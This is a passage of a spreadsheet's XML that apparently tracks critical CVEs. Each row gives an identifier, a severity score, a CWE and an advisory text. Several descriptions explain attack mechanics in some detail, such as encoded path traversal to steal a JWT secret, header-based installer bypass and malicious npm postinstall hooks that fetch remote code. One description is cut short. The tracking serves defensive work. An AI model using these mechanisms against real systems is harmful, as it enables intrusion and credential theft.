      <c r="I410" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J410" s="5" t="inlineStr"/>
      <c r="K410" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L410" s="5" t="inlineStr">
        <is>
          <t>An authentication bypass vulnerability exists in the WebGUI of Series UNIVERGE IX-R/IX-V. A user could bypass authentication and execute arbitrary CLI commands by tampering with WebGUI messages and sending them to the device via internet.</t>
        </is>
      </c>
      <c r="M410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16876</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19264</t>
        </is>
      </c>
      <c r="C411" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D411" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E411" s="5" t="inlineStr"/>
      <c r="F411" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G411" s="5" t="inlineStr"/>
      <c r="H411" s="5" t="inlineStr"/>
      <c r="I411" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J411" s="5" t="inlineStr"/>
      <c r="K411" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L411" s="5" t="inlineStr">
        <is>
          <t>Postiz is an open-source social media scheduling tool. The route that serves locally stored media joins URL-supplied path segments onto the upload directory and streams the file without normalising the path or confining it to that directory, and the route requires no authentication. Raw dot-segments are collapsed before routing, but URL-encoded separators survive route matching and are decoded only once they reach the handler, restoring the traversal at the filesystem call. An unauthenticated remote attacker can therefore read any file readable by the application process, including the process environment, which exposes the JWT signing secret, the database connection string, and connected provider and billing secrets. Because session tokens are signed with that secret and carry no expiry, this allows forging a non-expiring session as any user, including an administrator, without a password.</t>
        </is>
      </c>
      <c r="M411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19264</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21102</t>
        </is>
      </c>
      <c r="C412" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D412" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E412" s="5" t="inlineStr"/>
      <c r="F412" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G412" s="5" t="inlineStr"/>
      <c r="H412" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="I412" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J412" s="5" t="inlineStr"/>
      <c r="K412" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L412" s="5" t="inlineStr">
        <is>
          <t>Use after free in DualDAR prior to SMR Sep-2026 Release 1 allows local privileged attackers to execute arbitrary code with root privilege.</t>
        </is>
      </c>
      <c r="M412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21102</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25896</t>
        </is>
      </c>
      <c r="C413" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D413" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E413" s="5" t="inlineStr"/>
      <c r="F413" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="inlineStr">
        <is>
          <t>naturalintelligence:fast-xml-parser</t>
        </is>
      </c>
      <c r="I413" s="5" t="inlineStr">
        <is>
          <t>2026-02-20</t>
        </is>
      </c>
      <c r="J413" s="5" t="inlineStr"/>
      <c r="K413" s="5" t="inlineStr">
        <is>
          <t>CWE-185, CWE-79</t>
        </is>
      </c>
      <c r="L413" s="5" t="inlineStr">
        <is>
          <t>fast-xml-p</t>
        </is>
      </c>
      <c r="M413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25896</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41452</t>
        </is>
      </c>
      <c r="C414" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D414" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E414" s="5" t="inlineStr"/>
      <c r="F414" s="5" t="n">
        <v>0.025</v>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="inlineStr"/>
      <c r="I414" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J414" s="5" t="inlineStr"/>
      <c r="K414" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L414" s="5" t="inlineStr">
        <is>
          <t>Krayin CRM 2.2.4 contains a missing authentication vulnerability in the installer middleware that allows unauthenticated remote attackers to overwrite the primary administrator account by sending a crafted HTTP POST request with the X-Requested-With: XMLHttpRequest header to bypass the CanInstall middleware redirect check. Attackers can supply arbitrary name, email, and password values to the admin-config-setup endpoint, which performs an unauthenticated updateOrInsert targeting the hardcoded administrator user ID, enabling full administrative access to all CRM data.</t>
        </is>
      </c>
      <c r="M414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41452</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44402</t>
        </is>
      </c>
      <c r="C415" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D415" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E415" s="5" t="inlineStr"/>
      <c r="F415" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="inlineStr"/>
      <c r="I415" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J415" s="5" t="inlineStr"/>
      <c r="K415" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L415" s="5" t="inlineStr">
        <is>
          <t>Voltronic Power SNMP Web Pro 1.1 contains an unauthenticated remote code execution vulnerability in the upload.cgi firmware update endpoint that allows remote attackers to execute arbitrary commands as root by uploading a crafted tar archive without valid credentials. Attackers can supply a malicious tar archive containing arbitrary executable files that are extracted to a privileged directory and executed as root, achieving full system compromise.</t>
        </is>
      </c>
      <c r="M415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44402</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44990</t>
        </is>
      </c>
      <c r="C416" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D416" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E416" s="5" t="inlineStr"/>
      <c r="F416" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G416" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H416" s="5" t="inlineStr"/>
      <c r="I416" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J416" s="5" t="inlineStr"/>
      <c r="K416" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L416" s="5" t="inlineStr">
        <is>
          <t>ApostropheCMS is an open-source Node.js content management system, and sanitize-html provides a simple HTML sanitizer with a clear API. Under the default configuration, versions of `sanitize-html` prior to 2.17.4 can turn attacker-controlled content inside a disallowed `xmp` element into live HTML or JavaScript. This is a sanitizer bypass in the default `disallowedTagsMode: 'discard'` path and can lead to stored XSS in applications that render sanitized output back to users. Version 2.17.4 patches the issue.</t>
        </is>
      </c>
      <c r="M416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44990</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45118</t>
        </is>
      </c>
      <c r="C417" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D417" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E417" s="5" t="inlineStr"/>
      <c r="F417" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G417" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H417" s="5" t="inlineStr"/>
      <c r="I417" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr">
        <is>
          <t>CWE-83</t>
        </is>
      </c>
      <c r="L417" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the Contact module does not validate a redirect URL or protocol correctly, resulting in an open redirect and reflected JavaScript code injection. contact.php accepts the redirect target from the from HTTP parameter in $mybb-&gt;input['from'] or the Referer HTTP header in $_SERVER['HTTP_REFERER'] and passes it to redirect() without sufficient verification. A javascript: URI becomes the target of the `Click here if you don't want to wait any longer` link because $force_redirect is true, allowing script execution when a victim selects the link. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45118</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4599</t>
        </is>
      </c>
      <c r="C418" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D418" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E418" s="5" t="inlineStr"/>
      <c r="F418" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="inlineStr">
        <is>
          <t>kjur:jsrsasign</t>
        </is>
      </c>
      <c r="I418" s="5" t="inlineStr">
        <is>
          <t>2026-03-23</t>
        </is>
      </c>
      <c r="J418" s="5" t="inlineStr"/>
      <c r="K418" s="5" t="inlineStr">
        <is>
          <t>CWE-1023, CWE-338</t>
        </is>
      </c>
      <c r="L418" s="5" t="inlineStr">
        <is>
          <t>Versions of the package jsrsasign from 7.0.0 and before 11.1.1 are vulnerable to Incomplete Comparison with Missing Factors via the getRandomBigIntegerZeroToMax and getRandomBigIntegerMinToMax functions in src/crypto-1.1.js; an attacker can recover the private key by exploiting the incorrect compareTo checks that accept out-of-range candidates and thus bias DSA nonces during signature generation.</t>
        </is>
      </c>
      <c r="M418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4599</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47156</t>
        </is>
      </c>
      <c r="C419" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D419" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E419" s="5" t="inlineStr"/>
      <c r="F419" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G419" s="5" t="inlineStr"/>
      <c r="H419" s="5" t="inlineStr"/>
      <c r="I419" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J419" s="5" t="inlineStr"/>
      <c r="K419" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-639</t>
        </is>
      </c>
      <c r="L419" s="5" t="inlineStr">
        <is>
          <t>MantisBT is an open source bug tracker. Versions 2.28.3 and earlier contain a critical authentication bypass in the SOAP API's mci_check_login() function. Any user knowing any valid cookie_string can authenticate as any other user (knowing their username), including the administrator, without knowing the target's password. The vulnerability is exploitable with zero prior access on default MantisBT installations because self-registration is enabled by default ($g_allow_signup = ON). A self-registered user can use their own cookie_string (readable from their browser's MANTIS_STRING_COOKIE cookie after login) to impersonate the administrator via the SOAP API. The REST API is NOT affected. The REST API's AuthMiddleware derives the username server-side from the API token or session cookie, so the username cannot be spoofed. The Web UI is NOT affected. The Web UI authenticates via PHP session cookies (PHPSESSID) and validates the MANTIS_STRING_COOKIE against the logged-in user through auth_is_cookie_valid(). The username is derived server-side from the cookie, not supplied by the client. Version 2.28.4 contains a patch. No known workarounds are available.</t>
        </is>
      </c>
      <c r="M419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47156</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47187</t>
        </is>
      </c>
      <c r="C420" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D420" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E420" s="5" t="inlineStr"/>
      <c r="F420" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="inlineStr"/>
      <c r="I420" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J420" s="5" t="inlineStr"/>
      <c r="K420" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L420" s="5" t="inlineStr">
        <is>
          <t>SSHFS is a network filesystem client for connecting to SSH servers. Prior to version 3.7.6, a rogue SFTP server can return absolute symlink targets or relative targets containing parent-directory components that SSHFS passes through FUSE for resolution by the client kernel against the local filesystem. The documented transform_symlinks mitigation does not contain relative targets because transform_symlink() returns early at sshfs.c:2181, while sshfs_readlink() at sshfs.c:2234 to sshfs.c:2236 otherwise copies the server-supplied link target to the kernel. A victim or victim-side tool that follows such a link through ordinary operations such as cp, rsync, backup tooling, or an editor can disclose readable local files back to the server or write server-controlled content to writable local files, potentially including startup or scheduled-task files. This issue is fixed in version 3.7.6.</t>
        </is>
      </c>
      <c r="M420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47187</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47754</t>
        </is>
      </c>
      <c r="C421" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D421" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E421" s="5" t="inlineStr"/>
      <c r="F421" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G421" s="5" t="inlineStr">
        <is>
          <t>java, tomcat</t>
        </is>
      </c>
      <c r="H421" s="5" t="inlineStr"/>
      <c r="I421" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J421" s="5" t="inlineStr"/>
      <c r="K421" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-862</t>
        </is>
      </c>
      <c r="L421" s="5" t="inlineStr">
        <is>
          <t>Metacat is data repository software that helps researchers preserve, share, and discover data. Versions 2.x through 2.19.1 and all 1.x versions contain an unauthenticated path traversal in the `archiveEntryName` parameter of the `action=read` endpoint that is part of the original 1.x Metacat API. `ArchiveHandler.readArchiveEntry()` concatenates the user-supplied parameter into a filesystem path without validation, and the surrounding `hasReadPermission()` check is commented out. An unauthenticated remote attacker can read any file accessible to the Tomcat process by sending a single GET request. Proof-of-concept exploits have been demonstrated and verified against this vulnerability, and it should be considered easily exploitable for any Metacat deployment &lt; 3.0.0 by any user with access to the 1.x API. Through this vulnerability, production 2.x deployments are exposed to credential theft, client certificate and private key exfiltration enabling member node impersonation within the federation, embargoed research data disclosure, and broad system reconnaissance. Given Metacat's deployment footprint across the DataONE network of repositories and federally funded research programs, the population of exposed 2.x instances is non-trivial. The vulnerability was eliminated in Metacat version 3.0.0 and after by eliminating the entire Metacat 1.x API that exposed this vulnerability. The vulnerability was remediated in April 2024 with the release of Metacat 3.0.0, which removed the legacy Metacat API including ArchiveHandler.java. The commit message and issue reference architectural cleanup, not a security fix, and no advisory or CVE was issued. The 2.x branch was not and will not be backported, as is standard practice in Metacat, which only supports the most current release. 2.19.1 remains vulnerable with identical code and is beyond its supported lifetime. As a workaround, disable or restrict 1.x API servlets. Because the vulnerable 1.x API is no longer used or necessary in most Metacat deployments, restricting access to the old API endpoints can reduce or eliminate exposure for 2.19.x deployments.  After removing those features, restart Tomcat or whichever software is hosting the servlets.</t>
        </is>
      </c>
      <c r="M421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47754</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48046</t>
        </is>
      </c>
      <c r="C422" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D422" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E422" s="5" t="inlineStr"/>
      <c r="F422" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="inlineStr"/>
      <c r="I422" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J422" s="5" t="inlineStr"/>
      <c r="K422" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="L422" s="5" t="inlineStr">
        <is>
          <t>Streambert is a cross-platform Electron Desktop App to stream and download video content. Versions prior to 2.5.0 contain an unvalidated auto-updater URL vulnerability that allows a compromised renderer process to make the main process download and execute an arbitrary binary, resulting in remote code execution. Version 2.5.0 contains a patch.</t>
        </is>
      </c>
      <c r="M422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48046</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48063</t>
        </is>
      </c>
      <c r="C423" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D423" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E423" s="5" t="inlineStr"/>
      <c r="F423" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G423" s="5" t="inlineStr">
        <is>
          <t>java, sap</t>
        </is>
      </c>
      <c r="H423" s="5" t="inlineStr"/>
      <c r="I423" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J423" s="5" t="inlineStr"/>
      <c r="K423" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-345, CWE-346</t>
        </is>
      </c>
      <c r="L423" s="5" t="inlineStr">
        <is>
          <t>Baileys is a cocket-based TS/JavaScript API for WhatsApp Web. In versions prior to both 6.7.22 and 7.0.0-rc12, any Baileys session  can be sent a malicious payload via the placeholderResendMessage and trigger a fake messages.upsert event with a fake message key and payload. This allows anyone to spoof messages. The same exploit also allows an attacker to corrupt the app state sync system by sending fake key shares, and also allows for history sync spoofing which also serves the same problem, injecting fake previous context or "on-demand" sync. This issue has been fixed in versions 6.7.22 and 7.0.0-rc12.</t>
        </is>
      </c>
      <c r="M423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48063</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48158</t>
        </is>
      </c>
      <c r="C424" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D424" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E424" s="5" t="inlineStr"/>
      <c r="F424" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G424" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H424" s="5" t="inlineStr"/>
      <c r="I424" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J424" s="5" t="inlineStr"/>
      <c r="K424" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L424" s="5" t="inlineStr">
        <is>
          <t>use-context-selector is a React useContextSelector hook in userland Between 2026-05-18 15:57:18 and 2026-05-19 15:24:34, the default branch contained malicious commits 9d8481a513b7b0d1c0941b220c69b25de748641b through 6f2dae054ca014068bdbbb4db96006424d674124 that executed remote attacker-controlled code on developer machines during
`npm install`. The commits were removed by force-push, but local clones, forks, and direct-SHA URLs may still contain them, and `npm install` against an affected checkout will still execute the code today. The package was not published to npm. `src/install.js` was added and wired into the `postinstall` script. It fetched a JavaScript payload from an attacker-controlled HTTPS endpoint (configurable via an environment variable), disabled TLS verification, and evaluated the response as code with `require` available. Execution was deliberately skipped on CI and cloud/serverless environments, targeting developer workstations. The second-stage payload was attacker-hosted and cannot be reconstructed. Assume full compromise of anything reachable from a Node process with the user's permissions. Those who ran `npm install` against an affected checkout on a developer machine on or after 2026-05-18 15:57:18 should treat the machine as compromised, rotate every credential the machine could reach, audit account activity** since 2026-05-18 15:57:18, and clean local clones.</t>
        </is>
      </c>
      <c r="M424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48158</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48159</t>
        </is>
      </c>
      <c r="C425" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D425" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E425" s="5" t="inlineStr"/>
      <c r="F425" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G425" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H425" s="5" t="inlineStr"/>
      <c r="I425" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J425" s="5" t="inlineStr"/>
      <c r="K425" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L425" s="5" t="inlineStr">
        <is>
          <t>use-reducer-async is a React useReducer with async actions. Between 2026-05-18 16:29:52 and 2026-05-19 15:26:07, the default branch contained malicious commits da72edbde5705efcec6c62e0a3dcb73687b78dc8 through df07d5711458d8b46e11dd7afaaa21e88cafabfb that executed remote attacker-controlled code on developer machines during `npm install`. The commits were removed by force-push, but local clones, forks, and direct-SHA URLs may still contain them, and `npm install` against an affected checkout will still execute the code today. The package was not published to npm. `src/install.js` was added and wired into the `postinstall` script. It fetched a JavaScript payload from an attacker-controlled HTTPS endpoint (configurable via an environment variable), disabled TLS verification, and evaluated the response as code with `require` available. Execution was deliberately skipped on CI and cloud/serverless environments, targeting developer workstations. The second-stage payload was attacker-hosted and cannot be reconstructed. Assume full compromise of anything reachable from a Node process with the user's permissions. Those who ran `npm install` against an affected checkout on a developer machine on or after 2026-05-18 16:29:52 should treat the machine as compromised, rotate every credential the machine could reach, audit account activity since 2026-05-18 16:29:52, and clean local clones.</t>
        </is>
      </c>
      <c r="M425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48159</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48160</t>
        </is>
      </c>
      <c r="C426" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D426" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E426" s="5" t="inlineStr"/>
      <c r="F426" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G426" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H426" s="5" t="inlineStr"/>
      <c r="I426" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J426" s="5" t="inlineStr"/>
      <c r="K426" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L426" s="5" t="inlineStr">
        <is>
          <t>react-tracked provides state usage tracking with Proxies. Between 2026-05-18 19:26:36 and 2026-05-19 15:22:45, the default branch contained malicious commits 6978272a7d6ca02225cb747ea69f427512e33699 through 949f1a3d6bb1ff7d1a0dec892afd773e742627e8 that executed remote attacker-controlled code on developer machines during `npm install`. The commits were removed by force-push, but local clones, forks, and direct-SHA URLs may still contain them, and `npm install` against an affected checkout will still execute the code today. The package was not published to npm. `src/install.js` was added and wired into the `postinstall` script. It fetched a JavaScript payload from an attacker-controlled HTTPS endpoint (configurable via an environment variable), disabled TLS verification, and evaluated the response as code with `require` available. Execution was deliberately skipped on CI and cloud/serverless environments, targeting developer workstations. The second-stage payload was attacker-hosted and cannot be reconstructed. Assume full compromise of anything reachable from a Node process with the user's permissions. Those who ran `npm install` against an affected checkout on a developer machine on or after 2026-05-18 19:26:36 should treat the machine as compromised, rotate every credential the machine could reach, audit account activity** since 2026-05-18 19:26:36, and clean local clones.</t>
        </is>
      </c>
      <c r="M426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48160</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48996</t>
        </is>
      </c>
      <c r="C427" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D427" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E427" s="5" t="inlineStr"/>
      <c r="F427" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G427" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H427" s="5" t="inlineStr"/>
      <c r="I427" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J427" s="5" t="inlineStr"/>
      <c r="K427" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L427" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the default-on "Safe import" filter does not sanitize note titles, and the GeoMap note view interpolates a marker note's title into raw HTML that is rendered as innerHTML, allowing an attacker-supplied import archive to inject script that runs when the map is displayed. Because Safe import neutralizes scripts but never escapes titles, a note whose title contains an HTML event-handler payload survives the import and executes as soon as the victim opens the GeoMap that renders its marker. On the desktop client the Electron renderer runs with Node integration enabled, so the injected JavaScript escalates from cross-site scripting to full remote code execution on the victim's machine. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="M427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48996</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51106</t>
        </is>
      </c>
      <c r="C428" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D428" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E428" s="5" t="inlineStr"/>
      <c r="F428" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="inlineStr"/>
      <c r="I428" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J428" s="5" t="inlineStr"/>
      <c r="K428" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-502</t>
        </is>
      </c>
      <c r="L428" s="5" t="inlineStr">
        <is>
